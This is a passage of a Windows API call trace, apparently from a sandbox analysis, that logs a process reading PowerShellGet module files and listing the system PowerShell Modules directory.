nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.465] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x84000 [0088.465] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.466] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x85000 [0088.466] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.466] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x86000 [0088.466] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.467] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x87000 [0088.467] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.467] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x88000 [0088.467] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.468] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x89000 [0088.468] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.468] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8a000 [0088.468] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.469] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8b000 [0088.469] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.469] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8c000 [0088.469] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0xaa9, lpOverlapped=0x0) returned 1 [0088.469] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8caa9 [0088.469] ReadFile (in: hFile=0x468, lpBuffer=0x6c1f6c1, nNumberOfBytesToRead=0x157, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c1f6c1*, lpNumberOfBytesRead=0x4ebd8ec*=0x0, lpOverlapped=0x0) returned 1 [0088.469] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8caa9 [0088.469] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x0, lpOverlapped=0x0) returned 1 [0088.488] CloseHandle (hObject=0x468) returned 1 [0089.100] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0089.100] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x4f, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x4e [0089.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd644) returned 1 [0089.100] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), fInfoLevelId=0x0, lpFileInformation=0x67c1b50 | out: lpFileInformation=0x67c1b50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e634a0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x8caa9)) returned 1 [0089.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd640) returned 1 [0089.115] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0089.115] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0089.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe43c) returned 1 [0089.115] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x67e6088 | out: lpFileInformation=0x67e6088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0089.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe438) returned 1 [0089.128] EtwEventActivityIdControl () returned 0x0 [0089.130] SetEvent (hEvent=0x4d4) returned 1 [0089.130] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x4ebec1c*=0x4d4, lpdwindex=0x4ebea40 | out: lpdwindex=0x4ebea40) returned 0x0 [0089.131] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0089.131] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0089.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeafc) returned 1 [0089.131] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x67e9098 | out: lpFileInformation=0x67e9098*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0089.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeaf8) returned 1 [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0089.132] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0089.136] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules")) returned 0x10 [0089.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebee0c) returned 1 [0089.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0089.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x33, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0089.137] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*", lpFindFileData=0x4ebebbc | out: lpFindFileData=0x4ebebbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x24d0c840, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24d0c840, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d440 [0089.137] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x24d0c840, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24d0c840, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.137] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xca1d0904, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd9467d5c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xca1d0904, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0089.137] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b1d660, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.LocalAccounts", cAlternateFileName="MICROS~1.LOC")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24ce66e0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24ce66e0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24ce66e0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24ce66e0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24d0c840, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24d0c840, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b1d660, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b1d660, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b1d660, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bdbd40, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24ce66e0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24ce66e0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x24bdbd40, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bdbd40, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b8fa80, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b8fa80, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b8fa80, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~2")) returned 1 [0089.139] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~1")) returned 1 [0089.139] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0089.139] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0089.139] FindClose (in: hFindFile=0x34d440 | out: hFindFile=0x34d440) returned 1 [0089.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb7c) returned 1 [0089.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeddc) returned 1 [0089.139] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psd1")) returned 0xffffffff [0089.139] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psm1")) returned 0xffffffff [0089.139] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.cdxml")) returned 0xffffffff [0089.140] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.xaml" (normalized: 